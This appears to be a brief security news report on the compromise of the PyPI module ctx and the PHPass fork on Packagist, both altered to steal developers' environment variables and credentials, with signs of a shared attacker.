In a software supply chain attack, PyPI module ctx has been compromised. By this attack, the safer version of this module (which is downloaded 20,000 times a week) was replaced with code that exfiltrates the developer’s environment variables to collect secret codes like Amazon AWS keys.
‘Ctx’ is a minimal Python module that lets developers manipulate dictionary ‘dict’ objects in a number of ways. Interestingly, after remaining untouched for 8 years, newer versions started emerging on May 15 and contained malicious code. PyPI took down the malicious ctx versions soon, however, reports still indicate the presence of malicious code within all ctx versions.
Further, the attacker versions of PHPass fork, which are published to the PHP/Composer package repository Packagist, were altered to steal confidential keys and credentials. PHPass is an open-source password hashing framework that can be used in PHP applications. Released in 2005, the framework has been downloaded over 2.5 million times on Packagist. As per reports, malicious commits were made to PHPass project this week to steal environment variables.
The presence of identical logic and Heroku endpoints within the PyPI and PHP packages indicate a common threat actor being responsible for both of these hijacks. While there are few suspicions around the identity of the attackers, experts are not ruling out the possibility of a PoC exercise gone wrong.